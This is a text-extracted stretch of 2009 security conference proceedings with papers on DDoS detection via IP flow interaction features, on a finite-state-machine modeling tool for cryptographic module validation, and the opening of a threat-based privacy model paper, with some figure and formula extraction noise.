[4] Baugher, M., Carrara, E., Lindholm, F., Naslund, M., Norrman, K.: The Secure Real-time Transport Protocol (SRTP), RFC 3711, Internet Engineering Task Force (March 2004) [5] Arkko, J., Carrara, E., Lindholm, F., Naslund, M., Norrman, K.: MIKEY: Multimedia Internet KEYing, RFC 3830, Internet Engineering Task Force (August 2004) [6] Arkko, J., Torvinen, V., Camarillo, G., Niemi, A., Haukka, T.: Security Mechanism Agreement for the Session Initiation Protocol (SIP), RFC 3329, IETF (January 2003)

DDoS Attack Detection Using Three-State Partition Based on Flow Interaction Jieren Cheng1,2, Boyun Zhang3, Jianping Yin1, Yun Liu1, and Zhiping Cai1 1

School of Computer, National University of Defense Technology, 410073 Changsha, China 2 Department of Mathematics, Xiangnan University, 423000 Chenzhou, China 3 School of Information Science and Engineering, Central South University, Changsha, 410083, China [email protected]

Abstract. It is challenging to accurately detect Distributed denial of service (DDoS) attack quickly. We propose a novel IP Flow Interaction Behavior Feature (IFF) algorithm based on IP Flow Interaction via IP addresses and ports. IFF can be designed to provide normal profiles for normal flow and reflect the essential features created by different types of DDoS attacks. We define the network flow states into three states as the health state, quasi health state, and abnormal state by Using IFF. Based on former three state partition of network flow states, we present a simple and efficient DDoS attack detection method via self-adapting dual threshold and alarm evaluation mechanism (DASA). Our experiment results demonstrate that IFF can be used as a general DDoS attack diagnosis feature, and DASA can effectively detect abnormal flows containing DDoS attack flow with more accuracy and lower false alarm rate in a short detection time. Keywords: Network Security, Distributed Denial of Service, IP Flow Interaction, Three-State Partition.

1 Introduction Accurate and quick detection is an essential to minimize the damage of distributed denial of services (DDoS) attacks. The DDoS attack has become more difficult to make an accurate detection, because the DDoS attacks are tending to use actual source IP address to perform an attack [1] and it can make serious destroy on the victims by using periodically non-suspicious low-rate attack flows [2]. Moreover, it is difficult to perform real-time detection of network anomalies effectively for the largescale traffic. This paper proposes the IP Flow Interaction Behavior Feature (IFF) to quantify the state features of network flows according to the interaction between DDoS attack flow and normal flow. Based on three state partition of network flow states, we built an efficient detection model (DASA) for DDoS attack using self-adapting dual threshold of IFF time series of normal flows and alarm evaluation mechanism. The experiment results demonstrate that: IFF is a reliable, validated diagnosis feature for DDoS attack; DASA can recognize the abnormal phenomenon caused by DDoS D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 176–184, 2009. © Springer-Verlag Berlin Heidelberg 2009

DDoS Attack Detection Using Three-State Partition Based on Flow Interaction

177

attack flows, and realize a quick and efficient detection with lower false positive rate and false negative rate.

2 Related Work The abrupt traffic change based methods are the most popular ones [3,4], but the traffic offset cannot distinguish DDoS attack flow from normal flash crowd. Moreover, following the statistical features of normal flow, the attacker can perform a DDoS attack and avoid being detected by organizing many different attacking sources. For example, low-rate DDoS attack. Based on flow dissymmetry, the methods [5,6] can recognize dissymmetric attack flow effectively, whereas the coming-in and going-out rate of normal flow is not balanced sometimes. What is more, the attackers may launch an attack by using random spoofing source IP addresses or simulate legitimate user to send out attack packets by many attack sources without losing the power of attack. For the methods based on the distribution of attacking sources [7,8], they will generate high false negative when the attack flows are contained in large normal flows. The method [9] established detection models based on many statistical features of normal flow, they can detect all kinds of attacks. However, it is difficult to establish a stable model for different kinds of normal flows. The methods [10] adopt distributed collaborative sensors to detect and defense the attacks, but it is difficult to deploy the system and the detection quality relies on the ability of each sensor of the system. Multiple characteristics based methods [11,12,13] have lots of advantages over the detection methods based on single attack characteristic. However, the capability of detection is disturbed by large normal flows because they cannot separate attack flows from normal flows effectively.

3 IP Flow Interaction Feature The interaction is the common characteristic of network flows, but it is essentially different between normal flow and DDoS attack flow. Given a network flow F at time span T, which is described as < (t1, s1, sp1, d1, dp1), (t2, s2, sp2, d2, dp2),…, (tn, sn, spn, dn, dpn)>. Where i=1,2,…,n, ti denotes the time stamp of the ith packet, si, spi, di, dpi represent the source IP address, the source port, the destination IP address and the destination port of the ith packet respectively. Definition 1. Classify the n packets of F and make the packets with the same source IP address and destination IP address be in the same class. Denote the class, constituted by packets with the source IP address Ai, as IPS(Ai). Denote the class, constituted by packets with the destination IP address Aj, as IPD(Aj). If there is a source IP address Ai makes class IPS(Ai) and class IPD(Ai) non-empty, then the class IPS(Ai) is called an Interaction Flow (IF) and denoted as IF(Ai). If there is a source IP address Ai makes class IPD(Ai) empty, then IPS(Ai) is called an Source Half Interaction Flow (SH) and denoted as SH(Ai) and its number of different port numbers is denoted as Port(SH(Ai)). If there is a destination IP address Ai makes class IPS(Ai) empty, then IPD(Ai) is called an Destination Half Interaction Flow (DH) and denoted

178

J. Cheng et al.

as DH(Ai) and its number of different port numbers is denoted as Port(DH(Ai)). SH and DH are called as Half Interaction Flow (HF). Definition 2. Classify the n packets of F and get all the IFs denoted as IF1, IF2,…, IFM. All the SHs are denoted as SH1, SH2,…, SHS. All the DHs are denoted as DH1, DH2,…, DHD. We define the IP Flow Interaction Behavior Feature (IFF) as follows: IFFF =

S D 1 (| S − D | +∑ over ( Port (SHi )) + ∑ over ( Port ( DHi ))) M +1 i =1 i =1

(1)

x x /Δ t > θ in which Over ( x ) = ⎧ can help to magnify the attack flows and increase ⎨ ⎩ 0 x /Δt ≤ θ the detection rate when the random port numbers generate, Δt is the sampling time interval, θ is the threshold, which can be assigned the max value of normal HF flows by statistical method. The numerator of equation (1) quantifies the features of HFs, and the denominator of equation (1) quantifies the features of IFs. For normal IP flow, the number of IFs is large while the number HFs is relatively small. Moreover, the value of Port(SH(Ai)) and Port(DH(Aj)) keeps in a stationary normal range. Hence, IFF is small. Whereas, for DDoS attack flow resulting in denial of service, the number of IFs is small while the number HFs is relatively large. Furthermore, the value of Port(SH(Ai)) and Port(DH(Aj)) possible exceeds normal range. Thus, IFF is large. In every time period T, it is difficult and often impossible to make a large number of IP addresses of attack flows have interaction feature at any detection location. Besides, the network congestion caused by normal flows has something in common with DDoS attacks, but the IFF value of normal flows is stationary because of obeying the TCP congestion control protocol, the IFF value of attack flows is very large, as abrupt attack flows do not obey the TCP congestion control protocol. Therefore, the IFF is helpful for distinguishing the attack flow from the normal flows.

4 Attack Detection Method Assume the threshold of IFF for normal flows to be Y, then we can use model IFF≤Y to represent the normal flow, and IFF>Y to represent the abnormal flow. However, the detecting sensor is possible under the larger normal background network flows or near the DDoS attack sources, additionally, the normal flows might generate abnormal changes at some times, thus we need to improve the detection model. Using IFF time series, we propose a simple but effective detection method DASA. 4.1 Attack Detection Model Sample the normal network flow F with a time interval Δt, and calculate the IFF for each sampling. After N times sampling, a time series sample of IFF is obtained, A(N,Δt)={ IFF,i=1,2,…,N}, N is the length of the series. Let IFFi=ai, i=1,2,…,N, then use the sliding average method to eliminate the random noises of sample A:

DDoS Attack Detection Using Three-State Partition Based on Flow Interaction

At =

1 2h + 1

179

h

∑

i= − h

a t−i

(2)

At is the sliding average value at point t, h is the single side smooth distance. In order to avoid filtering useful information when filtering the noises, h should not be too large, we let h=1. Assume that A’h+1,A’h+2,…,A’n are obtained from a1,a2,…,an by the sliding average method. Calculate the average value mean(A’h+1,A’h+2,…,An) of A’h+1,A’h+2,…,A’n, denoted as Mean, Mean is used as the threshold of normal flows. Calculate the maximum value max(A’h+1,A’h+2,…,An ), denoted as Max, Max is used as the threshold of abnormal flows. Definition 3. The network flow states are divided into three states by using IFF. If IFF<=Mean, then the network flow state is called Health State. If Mean Max, then the network flow state is called Abnormal State. The normal network flow states change mainly between Health State and Quasi Health State, and sometimes change between Health State and Abnormal State, but when an attack occurs, the network flow state is translated into Abnormal State from Quasi Health State. Hence, we propose the attack detection model (ADM), which is defined as follows:

∀i, i > 1, G ( ai −1 , Mean) ∧ G (ai , Max ) → F (ai )

(3)

where i=2,…,n, G(x,y) present x>y, F(x) present x containing attack flows. Rule (3) present that ai contains attack flows if ai-1>Mean and ai>Max. In order to increase the detection precision, we propose a correction method for detection error and compensation, which is defined as follows:

∀i, i > 1, F ( ai ) ∧ G (ai −1 , Max ) → F ( ai −1 )

(4)

where i=2,…,n. Rule (4) present that ai-1 contains attack flows if ai contains attack flows and ai-1>Max. 4.2 Adaptive Dual Detection Threshold Estimate Algorithm

We can obtain the detection threshold values by the algorithm, which is given in table 1. If the result calculated by the algorithm is not satisfying, we may adjust the initial parameter values. For example, let max equate the maximum value among {a1,a2,…,an}. 4.3 Alarm Evaluation Mechanism

In order to decrease the number of false alarm rate caused by the network noise, congestion and some other reasons, we adopt an alarm evaluation mechanism based on the alarm frequency and time interval, which will generate DDoS attack alarms after the Num (Num≥1) anomalies are detected in a designated time interval ΔT(ΔT≥0). Larger ΔT and Num can decrease the risk of false alarms, but the time efficiency will be decrease too.

180

J. Cheng et al. Table 1. Adaptive dual detection threshold estimate algorithm

Algorithm 1. The adaptive dual detection threshold estimate algorithm Input: an initial sample A, A’(Ah+1,A h+2,…,An) of A, the Mean of A’, the Max of A’, a stopping criterion C, DT_Max, a ideal false alarm rate IFA. Output: the normal detection threshold DT_Mean, the abnormal detection threshold DT_Max, the real false alarm rate RFA the graph about the change of RFA with the increase of DT_Mean and DT_Max. processing procedure: 1. Initialization-related variables; 2. DT_Mean = Mean; 3. While (criterion C is not satisfied){ 4. Initialization-related variables; 5. DT_Max = DT_Mean; 6. While (RFA
5 Experiments and Results In this paper, the datasets include the 1999 normal datasets, 2000 DDoS attack datasets LLDoS 2.0.2 [14] from MIT Lincoln Lab and the normal flow dataset captured at the bone-net of a university with a bandwidth of 10G. 5.1 Experiments and Results about IFF Algorithm

We sampled form MIT normal dataset and calculated the IFF time series and the number of packets of the IFFs’ traffic. The results were depicted in figure 1. In the same way, the results captured at the bone-net of a university were depicted in figure 2, and the results from MIT attack dataset were depicted in figure 3. From figure 1, figure 2 and figure 3, we can see that, IFF can well reflect different state characteristics of normal network flow and DDoS attack flow. As depicted in figure 3, there are few IFFs which size is smaller than the size of attack traffic, and the main reasons is that the few normal flows responded become IFs. 20

150

100 Size

Size

Size of Normal Traffic IFF of Normal Flow

Size of Normal Traffic IFF of Normal Flow

15 10

50 5 0

0

50

100

150 200 250 300 Time Sample Point(1/0.01s)

350

400

0

0

50

100

150 200 250 300 Time Sample Point(1/0.1s)

Fig. 1. IFF time series of 1999 normal flow

350

400

DDoS Attack Detection Using Three-State Partition Based on Flow Interaction

False Alarm Rate and Detection Rate• %•

10000 Size of Normal Traffic IFF of Normal Flow

8000

Size

6000

4000

2000

0

0

500

1000 Time Sample Point(1/0.1s)

1500

2000

Fig. 2. Normal flow of the university bone-net

100

80 False Alarm Rate of DASA-based IFF Detection Rate of DASA-based IFF False Alarm Rate of SVM-based IFF Detection Rate of SVM-based IFF False Alarm Rate of SVM-based EFD Detection Rate of SVM-based EFD

60

40

20

0

1

2

3

4 5 6 7 Increase Multiple of Network Flow

8

9

10

Fig. 5. Compare of different detection method

150

1500

100

1000 Size

Size

181

50

0

500

IFF of Attack Flow Size of Attack Traffic 0

10

20

30 40 50 60 70 Time Sample Point(1/0.01s)

80

90

0

100

IFF of Attack Flow Size of Attack Traffic 0

10

20 30 40 Time Sample Point(1/0.1s)

50

60

Fig. 3. IFF time series of LLDoS2.0.2 network flow 1500

100

1000

Size

Size

150

50

0

500

IFF of Attack Flow Size of Attack Traffic 0

10

20

30 40 50 60 70 Time Sample Point(1/0.01s)

80

90

100

0

IFF of Attack Flow Size of Attack Traffic 0

10

20

30 40 50 Time Sample Point(1/0.1s)

60

70

80

Fig. 4. IFF time series of LLDoS2.0.2-Outside network flow

We simulated the attack flows sent by “Zombie” in indirect DDoS attack [13] using MIT LLSDDOS2.0.2-Outside.dump. Figure 4 shows that, for indirect DDoS attack, IFF can well reflect different state characteristics of attack flows from indirect DDoS attack. Thus, IFF can be used as a general DDoS attack diagnosis feature. 5.2 Experiments and Results about DASA Method

We compared IFF algorithm (IFF-SVM) with previous similar works, one of which is the Entropy of Feature Distributions (EFD) [7] algorithm (EFD-SVM) by SVM classifier. Moreover, we compared IFF-based DASA method (IFF-DASA) with IFFbased SVM method (IFF-SVM) under the same condition. Additionally, considering the fairness to both methods, the abnormal alarm time interval ΔT was set to zero, the number of anomalies Num was set to one. The sampling period Δt was 0.1s, the normal flows were from the MIT normal datasets, and the abnormal flows were the mixture of multiple MIT normal dataset and MIT attack datasets. As depicted in figure 5, the vertical axis represents the detection rate and the false alarm rate, the horizontal axis represents the multiple of the amount of normal packets divides the amount of attack packets. As the normal background network flows increase, the detection rate of IFF-SVM method drop from

182

J. Cheng et al.

100% to 98.2%, the average detection rate is 95.0%. The results demonstrate that IFF-SVM method can effectively identify the abnormal flows with DDoS attack flows, and is insensitive to large normal background flows. The main reason for false negative is that, due to the number of IF flows increasing with the increase of normal flows, it disturbs the extract of varied features about network state caused by attack flows and reduces the detection rate. The false alarm rate of IFF-SVM method increases from 0.0% to 1.5%, with an average false alarm rate 1.3%. The results show that IFF-SVM method can effectively identify normal flow and will not lead to high false positive. The main reasons for false positive are from two aspects: (1) The random network noise; (2) Network delay and packet lost. IFF is designed to extract interaction features of network flow on IP addresses and ports using one-dimensional characteristic vector and it can help to separate abnormal flows and normal flows effectively and calculate their characteristic values respectively. EFD is designed to extract feature distributions of IP addresses and ports of DDoS attack flows using four-dimensional characteristic vector and calculate the features value without distinguishing the normal flows from abnormal flows. By comparison, IFF algorithm makes for a lower false negative and false positive. As depicted in figure 5, for IFF-DASA method, as the normal background network flows increase, the detection rate of IFF-SVM method drop from 100% to 98.0%, which average detection rate is 94.3%, the false alarm rate of DASA method is 0.0% for each test. The results show that IFF-DASA method has same detection rate and lower false alarm rate compared with IFF-SVM method. IFF-SVM method detects IFF of current network flows in isolation, but IFF-DASA method detects IFF of current network flows by associating with the former states of IFF. Therefore, IFFDASA method can well make use of the IFF feature and accurately detect the DDoS attacks under large normal background network flows. In addition, we repeated the experiments above on the normal dataset of the university bone-net and MIT attack dataset. We generated the abnormal flow samples by mixing the normal flows with some attack packets in every sampling period Δt (the sampling period Δt was set to 0.1s for normal flows, flooding packet rate is number of packet /0.1second). The results are shown in table 2. As depicted in table 2, DR is the detection rate, FR is the false alarm rate, Rate is the flooding packet rate, the normal flows are same on each experiment. IFF-DASA method has lowest false alarm rate and highest detection rate among three methods in table 2. Table 2. Compare of different detection method Rate (%)

IFF-DASA IFF-SVM EFD-SVM

DR FR DR FR DR FR

120 (pkt/0.1s) 97.1 0.0 85.6 0.3 84.1 0.0

180 (pkt/0.1s) 100.0 0.0 100.0 0.3 94.9 0.0

240 (pkt/0.1s) 100.0 0.0 100.0 0.3 97.9 0.0

300 (pkt/0.1s) 100.0 0.0 100.0 0.3 99.4 0.0

360 (pkt/0.1s) 100.0 0.0 100.0 0.3 100.0 0.0

DDoS Attack Detection Using Three-State Partition Based on Flow Interaction

183

In summary, IFF can be used as a well general DDoS attack diagnosis feature. The DASA method can well make use of the IFF feature and realize a fast and efficient DDoS attacks detection in real-time.

6 Conclusions This paper proposes a new IP Flow Interaction Behavior Feature (IFF) algorithm. Using IFF time series of the network flow, the network flow states are defined as Health State, Quasi Health State, and Abnormal State. Based on three network states, we propose an efficient DDoS detection method (DASA). DASA method employs adaptive dual detection threshold estimate algorithm and alarm evaluation mechanism to improve the detection quality. Analysis and experiments shows that, IFF can reflect the interaction characteristics of the normal flows and the essential features of DDoS attack, and it is well general DDoS attack diagnosis feature; DASA can effectively distinguish normal flows from abnormal flows containing DDoS attack flow, and it can realize fast detection with high detection rate and low false positive rate. Acknowledgments. This work is supported by National Science Foundation of China (60970034, 60603062, 60603015), Scientific Research Fund of Hunan Provincial Education Department (07C718), the Foundation for the Author of National Excellent Doctoral Dissertation (2007B4), Science Foundation of Hunan Provincial (06JJ3035), Application of Innovation Plan Fund of the Ministry of Public Security (2007YYCXHNST072), and Postdoctoral Science Foundation of Central South University.

References 1. Handley, M.: DoS-resistant Internet subgroup report. Internet Architecture WG (2005) 2. Kumar, V., Jayalekshmy, P., Patra, G., et al.: On Remote Exploitation of TCP Sender for Low-Rate Flooding Denial-of-Service Attack. IEEE Communications Letters (2009) 3. Cheng, C., Kung, H., Tan, K.: Use of spectral analysis in defense against DoS attacks. In: Proceedings of IEEE GLOBECOM (2002) 4. Lakhina, A., Crovella, M., Diot, C.: Diagnosing Network-Wide Traffic Anomalies. In: Proceedings of ACM SIGCOMM, Portland, Oregon, USA (2004) 5. Abdelsayed, S., Glimsholt, D., Leckie, C., et al.: An efficient filter for denial-of service bandwidth attacks. In: Proceedings of the 46th IEEE GLOBECOM (2003) 6. Mirkovic, J., Reiher, P.: D-WARD: A Source-End Defense Against Flooding Denial-ofServiceAttacks. IEEE Trans. on Dependable and Secure Computing (2005) 7. Lakhina, A., Crovella, M., Diot, C.: Mining Anomalies Using Traffic Feature Distributions. In: Proceedings of ACM SIGCOMM, Philadelphia, Pennsylvania, USA (2005) 8. Peng, T., Leckie, C., Kotagiri, R.: Proactively detecting distributed denial of service attacks using source ip address monitoring. In: Proceedings of the Third International IFFP-TC6 Networking Conference (2004) 9. Forrest, S., Hofmeyr, S.: Architecture for an artificial immune system. Evolution. Computat. 7(1), 45–68 (1999)

184

J. Cheng et al.

10. Vitaly, S., Ming, W.: Security against probe-response attacks in collaborative intrusion detection. In: Proceedings of ACM SIGCOMM (2007) 11. Cheng, J., Yin, J., Liu, Y., et al.: Detecting Distributed Denial of Service Attack Based on Address Correlation Value. Journal of Computer Research and Development (2009) 12. Cheng, J., Yin, J., Liu, Y., et al.: DDoS attack detection Algorithm using IP Address Features. In: Deng, X., Hopcroft, J.E., Xue, J. (eds.) FAW 2009. LNCS, vol. 5598. Springer, Heidelberg (2009) 13. Cheng, J., Yin, J., Wu, C., et al.: DDoS Attack Detection Method Based on Linear Prediction Model. In: Huang, D.-S., et al. (eds.) ICIC 2009. LNCS, vol. 5754, pp. 1004– 1013. Springer, Heidelberg (2009) 14. http://www.ll.mit.edu/mission/communications/ist/corpora/ ideval/data/index.html

A Development of Finite State Machine Create Tool for Cryptography Module Validation Jae-goo Jeong, Seung-yong Hur, and Gang-Soo Lee Hannam University, Computer Engineering Ojeong dong 133, Daejeon, Korea [email protected], [email protected], [email protected]

Abstract. The CMVP is system for objective evaluation of cryptographic modules, evaluation activities using by security function requirements in CMVP. Finite state model (FSM) is model which use cryptographic module to testing activity. It should be testing and modeling, but modeling method not exist in CMVP guidance. So, the FSM modeling depends on only developer's experience. Thus, in this paper, we describe FSM modeling and validation method, and we develop to FSM create tool. Keywords: CMVP, Finite State Machine, Validation, State Chart Diagram.

1 Introduction The information system should be used to cryptographic module information security for users. Type of these cryptographic modules exists in hardware and type that is various to software, firmware, and Commercial off the Shell (COTS) product and Government off the Shell (GOTS) product are developed present. The Cryptographic Module Validation Program (CMVP) was established at the US and Canada in 1995 to enable access to product that user's requires, and it obtain confidence result through verification of evaluators. This system validates and testing whether fulfill requirements that cryptographic module is correct in level. When evaluate cryptographic module, the FSM is correct active state, and do it so that may model necessarily to judge consistent active availability. But, guide for present the FSM modeling is not particular definitely, and that depends entirely on experience of developer to modeling. Also, the FSM is not general open, and verification method about model doesn't appear perfectly. Therefore, in this paper, we survey general modeling method about the FSM through the CMVP security policy document. And we present about verification method about modeling state for this. Also, we present method that can helps to cryptographic module developer and evaluator utilizing the FSM modeling support tool. D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 185–192, 2009. © Springer-Verlag Berlin Heidelberg 2009

186

J.-g. Jeong, S.-y. Hur, and G.-S. Lee

The organization of this paper is as following: The chapter 1 explains about define and form about concept and finite state model of CMVP. Also, the chapter 3 explains about modeling method for finite state model. The chapter 4 introduces and explains about support tool for a state diagram modeling. Finally, chapter 5 explains about conclusion and future work.

2 Cryptographic Module Validation and FSM 2.1 What Is the CMVP? The CMVP makes to be trust and objective for the information security systems. Thus, it has testing through the testing laboratories. And this program is already using by various country such as US, Canada, Korea, and Japan [4] [7]. The FIPS 140-2 is Cryptographic module validation guidance, It has tenth validation function requirements, and classified security level from 1 to 4[1]. CMVP security requirement classes shows as follows: y y y y y y y y y y

Cryptographic module specification Cryptographic module port and interface Roles, service, and authentication Finite State model Physical security Operation environment Cryptographic key management Self-tests Design assurance Mitigate of other attacks

2.2 Relation of between CMVP and FSM The FSM is consisted of finite state and transition. And, this is state model which change in other state corresponding in outside stimulation. To cryptographic validation, the FIPS 140-2(guidance of cryptographic module validations) has requirements specification for FSM validation, as follows [2]: Power on/off states, Crypto officer states CSP/PSP(Critical Security Parameter) entry states, User states, Self-test states, Error states, Bypass state [Optional], Quiescent state [Optional]

① ③

⑥

⑦

②

⑧

④

⑤

3 Modeling on the FSM The FIPS 140-2 is no modeling guide that detail for FSM in Cryptographic module validation and testing guidance. Because the FSM is secret of developer's cryptographic module and the FSM has many of kinds. In this paper, we analyze that SP for Cryptographic module used by developer and evaluator. And we present the FSM Modeling methods.

A Development of Finite State Machine Create Tool

187

3.1 Method of State Diagram Modeling (1) Modeling on State Transition Table The ‘State transition table’ is used to the CMVPs FSM validations. This table exist the each ‘state’, ‘Input (entry)’, ‘Output (Do/Action)’ and ‘Next State’ from the CMVP evaluation deliverables. Table 1 shows the template of Standard of state transitions table. Table 1. Template of standard of state transition table state (* = standard state) composite detailed state state power

crypto officer*

power-on* power-off* cryptographic initialize* preliminary activation activation Cryp nonto activation key mana destroyed geme nt damaged destroyed damaged execution cryptography calculations

user*

for

execution for target of validation by protection function execution for target of non-validation by protection function

entry*

key entry CSP entry

event (input)

Do/action (output)

next state

“Write on events”

“Write on outputs”

“Write on next state”

188

J.-g. Jeong, S.-y. Hur, and G.-S. Lee Table 1. (continued) self-test* error*

self-test Try to encryption without crypto key and CSP hard error

soft error bypass* (optional) maintenance* (optional)

(2) Modeling on Using Relation of Each State In this section, we present the relation of each state (i.e. reflection, parallel, selection). And, table 2 shows the example of relation of each state. Table 2. Example of relation of the each state Relations

Example

Reflection state (S R )

This state returns by ‘activate state’ again

Modeling

‘Power on’/‘power off’ state, ‘target Symmetry or Toggle of validation’/‘target of nonvalidation’, etc. S' = T(S, t), S = T(S', S') (S t'), S' = T(T(S', t'), t) Consequence state ‘Test’ is cause; ‘Test error’ is effect. It's same with consequence. (S S') S' = T(S, t)

⇔

⇒

Parallel state(S

state is begun at the same time ∥S') This each other. and modeling to ‘fork/join’

Selection state (S ⊕ This state is selected ‘one’, and then activated S')

(3) Modeling Based on Life-Cycle Process This model is method that Cryptographic module's operation from life-cycle process and modeling by cryptographic module's ‘State’ and ‘Transition’. This method helps to make state diagram to users briefly. Figure 1 shows the example of modeling based on life-cycle process. This divides each active state and hold state. And, it expressed to the cryptographic module's creation state from the exit state.

A Development of Finite State Machine Create Tool

189

Fig. 1. Example of modeling based on Life-cycle process

3.2 Validation Checklist for State Diagram The FSM validations should be achieved necessarily and it execute repeatedly at modeling phase in CMVP. Thus, in this chapter, we are categorized to verification attributes through the FIPS 140-2 DTR, and we proposed to validation checklist as follows: (1) Correctness & Completeness y Is developer modeling to all attribute of Cryptographic module in state diagram/state transition tables? y Is developer modeling to only one state? y Did all state and transition have the different first name? y Did exception instance appear properly? (2) Reachability y At the initial state, is the FSM reachable in all state trough reasonable transition? y Didn't FSM reached in unreasonable End and critical state? (3) Consistency y Does state diagram/state transition table keep consistency with developer document? y Does state diagram and Cryptographic module keep consistency in operations? (4) Redundancy & Conflictness y Isn't state redundancy each other? y Does outside transition conflict with inside transitions? y Does outside transition conflict with complete transitions? 3.3 TTP and CYC Create for Statediagram Validation (1) Calculate for the Number of CYC For the cryptographic module's estimate the transition path's ‘complexity’ and a number of ‘transitions’ [9], we used to Cyclomatic Number (CYC). The CYC is same with 'closed spaces', and CYC’s calculation is as following

190

J.-g. Jeong, S.-y. Hur, and G.-S. Lee

CYC = the number of transition + the number of state + 2 For the State diagram's validation, that should be test from initial state to end state through the Test Transition Path (TTP) with CYC. (2) Method of Create for the TTP The TTP is path to test all transition of state diagram. So, for the creation TTP, we proposed to Algorithm for TTP creation’. The algorithm composed to ‘symmetric state’ and ‘reflection transition’ each separately, because algorithm is non-deterministic algorithm, result that TTP is always different. The algorithm of TTP creation shows as following: [Algorithm of create TTP] while (The ‘Symmetric state’ and ‘refraction state’ in the state diagram) do case ‘Symmetric state’: S and S' = symmetric state(Toggle state); T1 = Transition that go from S to S'; T2 = Transition that go from S' to S; print S-T1-S'-T2-S; // T1, T2 non-naming output ‘*’ T1 and T2 deleted in the statediagram; count = count + 1. case ‘Reflection state’: S = reflection state; print S-T-S; // T is same with S's reflect transition T Delete in the statediagram; count = count + 1. end while (Transition is existence in the statediagram) do while (Cycle or transition of S that exist in the statediagram) do S = state that transition exists; S' = state linked in transition of S; print S-T-S'; // T is transition from S to S' T delete in the state diagram; S = S'; end continuous repetition removed in Output; print newline; count = count + 1; end CYC = the number of transition - the number of state + 2 // Cyclomatic number of state diagram

A Development of Finite State Machine Create Tool

191

4 Implement of State Diagram Create Tool We developed ‘CM-Statechart’ for drawing the cryptographic module's FSM. The CM-Statechart developed by ‘StarUML’[10] that is open source ‘UML’ creation tool. Figure 2 shows the functions structures of CM-Statechart. Figure 3 shows the example of CM-Statechart, and that reflected to structure of CM-Statechart and example of CM-statecharts.

Fig. 2. Functions structure of CM-Statecharts

Fig. 3. CM-Statecharts

5 Conclusion and Future Work Cryptographic module validation program should be verification to Finite state machine. But, it doesn’t have correctable method. So, in this paper, we survey the FSM specification method for cryptographic module validation. And it is shown that FSM modeling validation though the SP documents, as well as, we developed to method for FSM specification and FSM create tools through UML 2.0. In the future we intend to result and future work as follows: y

Nowadays, the FSM isn't enough to Cryptographic module validation guidance. So, we developed method and FSM create tool that make easily FSM. Thus, method for the FSM specification helps to vendors and evaluators.

192

J.-g. Jeong, S.-y. Hur, and G.-S. Lee

y y

The FSM can use to requirements specification language with UML, that need to relate works. (e.g., Class diagram, UseCase Diagram, etc...) In the future, we will help to vendors and evaluators through development of FSM automatic create tools. And we will develop to FSMs attribute validation tools too.

References 1. NIST FIPS PUB 140-2, Security Requirements for Cryptographic Module (May 2001) 2. NIST FIPS PUB 140-3(Draft), Security Requirements for Cryptographic Module (July 2007) 3. Derived Test Requirements (DTR) for FIPS 140-2, Security Requirements for Cryptographic Module (June 2004) 4. Cryptographic Module Validation Program, http://csrc.nist.gov/group/STM/cmvp/index.html 5. Japan Cryptographic Module Validations Program, http://www.ipa.go.jp/security/english/jcmvp.html 6. Pap, Z., et al.: Method of Checking General Safety Criteria in UML Statechart Specification. Reliability Engineering & System Safety 87, 89–107 (2005) 7. Pap, Z., et al.: Completeness and of Consistency Analysis on UML Statechart Specification. In: Proc. IEEE Design and Diagnostics of Electronic Circuit and System Workshop (DDECS 2001) (May 2001) 8. Korea IT Security Certification Center, http://www.kecs.go.kr 9. NIST SP 500-235, Structured Testing: A Testing Methodology using the cyclomatic complexity metric A. Watson and McCabe (September 1996) 10. StarUML Project, http://staruml.sourceforge.net/ko/index.php

A Privacy-Aware System Using Threat-Based Evaluation and Feedback Method in Untrusted Ubiquitous Environments Yuan Tian, Biao Song, and Eui-Nam Huh Department of Computer Engineering Kyung Hee University Global Campus, South Korea [email protected], [email protected], [email protected]

Abstract. As the most often-cited criticism, privacy has been concerned by more and more users who need services supply. In most cases, users can not expect the hazards caused by disclosed data for the lack of specialist knowledge, unless they know the potential threat previously. Besides, users also hope their data can be disclosed in a minimal way thus the potential threats to their data can be decreased as minimum as possible. To address this problem, in this paper, a threat-based model is presented for privacy data management. A key feature of our proposed model is it allows users to customize the services on the basis of their consents to the potential threats. Furthermore, user can select a best service from a trustable company with reference to other users’ feedback. To evaluate the proposed system, three simulations for selecting optimal services are performed in this research. Keywords: Privacy, Threat, Purpose.

1 Introduction Information privacy is constantly in spotlight these years. As modern technology makes it easy to collect and preserve people’s data, so the protection for user privacy became a critical issue and has been discussed in different ways. The concept of privacy is defined by Jones [1] as “… not having things known about you that you don’t choose to have known, or at least you know that they are known and by whom.” We must consider privacy first before the development process, thus avoid expensive errors in the deployed system [2]. Not surprisingly, many privacy-aware technologies have been devoted to facilitate the managing of users’ privacy data. A survey in the Federal Trade Commission [9] shows that nearly all web sites collect users’ names, mobile numbers, and other identifying information, which induce potential discloser of users’ personal information. At the same time, some users voluntarily provide information to some social networking webs such as Facebook, in order to stay up-to-date with developments in their lives. But it’s hard for them to retain privacy as well as benefit from these web services at the same time. In order to meet growing requirements for privacy management, many privacy technologies have been proposed. Among which, the most related issue to our work is D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 193–200, 2009. © Springer-Verlag Berlin Heidelberg 2009

194

Y. Tian, B. Song, and E.-N. Huh

the purpose [3, 4]. The basic concept of purpose is the reason for which information is being collected and processed. As a key role in privacy data management, a purpose sets a boundary in data processing to control the intended usage of data. On the basis of purpose, a Hippocratic database [5] was proposed by R. Agrawal et al, which stores purpose in database as an attribute to specify the reason for which a piece of information can be used. The mechanism of Hippocratic database was extended by F. Massacci et al [8], which use goal-oriented approaches [6] to organize purpose into AND/OR tree hierarchies by modeling and analyzing of purposes in Hippocratic databases. They assume “customers could be able to understand how their personal data will be used and, in case they agree, disclose them”. However, under the untrusted ubiquitous environment, we believe that users can not set cost (penalties) on the data elements by themselves for the lack of specialist knowledge, unless they know the potential threat previously. Besides, users hope their data can be disclosed in a minimal way since, the more the data is disclosed, the more threats they have to endure. Thus, in this paper, a technical privacy-aware model on the basis of threat analysis is presented. In our proposed system, users can specify their privacy preferences by setting penalty values on potential threats. Moreover, another contribution of our work is it provides feedbacks about the companies from different users, which supply an optimal service to user from a trusty company with minimal data disclose. By using Analytic Hierarchy Process (AHP) approach [7], a comparison between each pair of threats is provided to evaluate which service suits user’s need properly. Besides, we organize threats through an AND/OR refinement to calculate the importance of each data and the service with minimal data disclosure is provided through a reverse AND/OR refinement. Comparing with existing approaches which allow users to set penalty values in data elements, our approach is quite improved since it provides an intuitive way to measure the effect caused by 